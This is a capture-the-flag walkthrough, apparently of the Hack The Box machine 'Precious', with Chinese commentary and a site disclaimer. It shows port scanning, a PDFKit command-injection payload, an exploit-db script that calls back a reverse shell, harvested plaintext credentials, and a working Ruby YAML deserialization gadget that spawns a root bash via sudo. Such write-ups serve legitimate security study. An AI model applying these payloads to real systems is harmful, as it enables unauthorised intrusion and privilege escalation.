Information Gathering

$ ip='10.10.11.189'; itf='tun0'; if nmap -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 845e13a8e31e20661d235550f63047d2 (RSA)
|   256 a2ef7b9665ce4161c467ee4e96c7c892 (ECDSA)
|_  256 33053dcd7ab798458239e7ae3c91a658 (ED25519)
80/tcp open  http    nginx 1.18.0
|_http-title: Did not follow redirect to http://precious.htb/
|_http-server-header: nginx/1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Ruby && PDFKit v0.8.6 RCE

# echo '10.10.11.189 precious.htb'>>/etc/hosts

$ whatweb http://precious.htb/ -v

http://10.10.16.28/target.txt

$ ./exiftool q6whs0fu6nzcp86yervxcasxcxqofm8k.pdf

Generated by pdfkit v0.8.6

PDFKit v0.8.6 是一个用于生成 PDF 文档的工具，但它并不是 JavaScript 版本的 PDFKit，而是 Ruby 版本的 PDFKit。它基于 wkhtmltopdf 后端工具，通过 HTML 和 CSS 来创建 PDF 文档。该版本支持 Ruby 2.5、2.6、2.7、3.0 和 3.1

https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795

http%20`ping -c 1 10.10.16.28`

https://www.exploit-db.com/exploits/51293

$ python3 kit.py -s 10.10.16.28 443 -w http://precious.htb -p url

Ruby to henry

ruby@precious:~$ grep -iR henry

username:henry
password:Q3c1AqGHtoI0aXAYFH

User.txt

5122df0943bba969f407138e7456440a

Privilege Escalation: Ruby YAML deserialization

henry@precious:~$ sudo -l

# Compare installed dependencies with those specified in "dependencies.yml"
require "yaml"
require 'rubygems'

# TODO: update versions automatically
def update_gems()
end

def list_from_file
    YAML.load(File.read("dependencies.yml"))
end

def list_local_gems
    Gem::Specification.sort_by{ |g| [g.name.downcase, g.version] }.map{|g| [g.name, g.version.to_s]}
end

gems_file = list_from_file
gems_local = list_local_gems

gems_file.each do |file_name, file_version|
    gems_local.each do |local_name, local_version|
        if(file_name == local_name)
            if(file_version != local_version)
                puts "Installed version differs from the one specified in file: " + local_name
            else
                puts "Installed version is equals to the one specified in file: " + local_name
            end
        end
    end
end

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Insecure%20Deserialization/Ruby.md

在其他目录创建dependencies.yml文件,ruby程序YAML.load(File.read("dependencies.yml"))将指向其他工作目录下的dependencies.yml

---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
          read: 0
          header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
          socket: &1 !ruby/object:Gem::RequestSet
              sets: !ruby/object:Net::WriteAdapter
                  socket: !ruby/module 'Kernel'
                  method_id: :system
              git_set: /bin/bash
          method_id: :resolve

henry@precious:~$ sudo /usr/bin/ruby /opt/update_dependencies.rb

Root.txt

822a67160b990d37b78c84fb03256922

4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途，否则一切后果请用户自负。

本站信息来自网络，版权争议与本站无关。您必须在下载后的24个小时之内，从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序，请支持正版，购买注册，得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解！

程序来源网络，不确保不包含木马病毒等危险内容，请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱：4ablog168#gmail.com（#换成@）